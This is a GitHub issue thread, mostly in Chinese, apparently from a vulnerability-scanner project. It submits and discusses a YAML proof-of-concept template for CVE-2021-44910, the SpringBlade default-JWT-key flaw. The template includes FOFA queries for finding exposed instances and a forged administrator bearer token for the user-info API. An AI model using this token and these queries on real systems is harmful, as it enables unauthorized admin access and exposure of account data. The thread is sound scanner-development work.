CVE-2021-44910 #124

leonardo-o1 · 2024-04-26T06:57:12Z

FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"
验证：

id: CVE-2021-44910  # 身份标识  和文件名一样  冒号后都有空格
 
info:   # poc 信息描述   注意缩进 父子关系  yaml语言和python相似  重视格式
  name: SpringBlade 框架JWT认证缺陷漏洞
  author: leo   #作者
  severity: high    # 漏洞等级 info(信息)、low(低危)、medium(中危)、high(高危)、critical(紧急)
  tags: SpringBlade
  verified: true  # true 漏洞已通过验证，false未验证
  description: |    # # 漏洞描述、测绘等    |是yaml语言 多行换行用法
   SpringBlade 框架jwt存在默认key，可任意篡改登录凭证jwt
   FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"
  reference: # 参考 引用的文章
  - https://forum.butian.net/share/973
  - https://github.com/chillzhuang/blade-tool/blob/master/blade-core-launch/src/main/java/org/springblade/core/launch/constant/TokenConstant.java  #  - 插入列表
  - https://github.com/dockererr/CVE-2021-44910_SpringBlade/blob/main/CVE-2021-44910.py
  
rules:  #poc 本体 规则集合
  r0:   # 规则名随便起
    request:  # request 请求
      method: GET  # POST  PUT GET
      path: /api/blade-user/info  #路径  api/blade-user/user-list,api/blade-log/api/list
    expression: response.status == 401 && response.body.bcontains(b'"code":401')

  r1:   # 规则名随便起
    request:  # request 请求
      method: GET  # POST  PUT GET
      path: /api/blade-user/info  #路径  api/blade-user/user-list,api/blade-log/api/list
      headers:
          Blade-Auth: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSJ9.-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg
    expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"success":true')

expression: r0() && r1()

The text was updated successfully, but these errors were encountered:

zan8in · 2024-04-26T07:25:53Z

感谢，不过你的 expression 判断过于简单，容易误报，下次再增加一些唯一性验证会更好。

leonardo-o1 · 2024-04-26T09:11:21Z

感谢，不过你的 expression 判断过于简单，容易误报，下次再增加一些唯一性验证会更好。

好的，添加了认证前访问401的判断，再看下呢

zan8in · 2024-04-26T11:55:23Z

不错的办法，这个漏洞之前写过，现已上传到github，你看下是否需要把你的poc 合并进去

ViCrack · 2024-04-26T15:20:45Z

不用加认证前访问的判断吧，节省发包量，按照这个图来说，因为返回的json结构字段比较多，所以增加字段特征应该就足够了

      - '"success":true'
      - '"account":'
      - '"password":'
      - createDept
      - xxxxxxx
      - xxxxxxxx

nuclei也有这个的yaml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2021-44910 #124

CVE-2021-44910 #124

leonardo-o1 commented Apr 26, 2024 •

edited

zan8in commented Apr 26, 2024

leonardo-o1 commented Apr 26, 2024 •

edited

zan8in commented Apr 26, 2024

ViCrack commented Apr 26, 2024

CVE-2021-44910 #124

CVE-2021-44910 #124

Comments

leonardo-o1 commented Apr 26, 2024 • edited

zan8in commented Apr 26, 2024

leonardo-o1 commented Apr 26, 2024 • edited

zan8in commented Apr 26, 2024

ViCrack commented Apr 26, 2024

leonardo-o1 commented Apr 26, 2024 •

edited

leonardo-o1 commented Apr 26, 2024 •

edited